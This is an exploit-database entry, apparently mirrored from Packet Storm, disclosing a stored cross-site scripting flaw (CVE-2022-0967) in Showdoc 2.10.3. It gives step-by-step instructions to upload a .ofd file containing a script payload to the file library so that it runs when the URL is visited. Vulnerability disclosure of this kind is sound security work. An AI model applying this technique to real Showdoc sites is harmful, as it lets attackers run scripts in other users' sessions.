Exploit for Showdoc 2.10.3 Cross Site Scripting CVE-2022-0967

Name: Exploit for Showdoc 2.10.3 Cross Site Scripting CVE-2022-0967
Rating: 5 (138 reviews)

2022-05-17 | CVSS 3.5

## https://sploitus.com/exploit?id=PACKETSTORM:167198
# Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)  
# Exploit Author: Akshay Ravi  
# Vendor Homepage: https://github.com/star7th/showdoc  
# Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3  
# Version: <= 2.10.3  
# Tested on: macOS Monterey  
# CVE : CVE-2022-0967  
  
Description: Stored XSS via uploading file in .ofd format  
  
1. Create a file with .ofd extension and add XSS Payload inside the file  
  
filename = "payload.ofd"  
payload = "<script>alert(1)</script>"  
  
2. Login to showdoc v2.10.2 and go to file library  
  
Endpoint = "https://www.site.com/attachment/index"  
  
3. Upload the payload on file library and click on the check button  
4. The XSS payload will executed once we visited the URL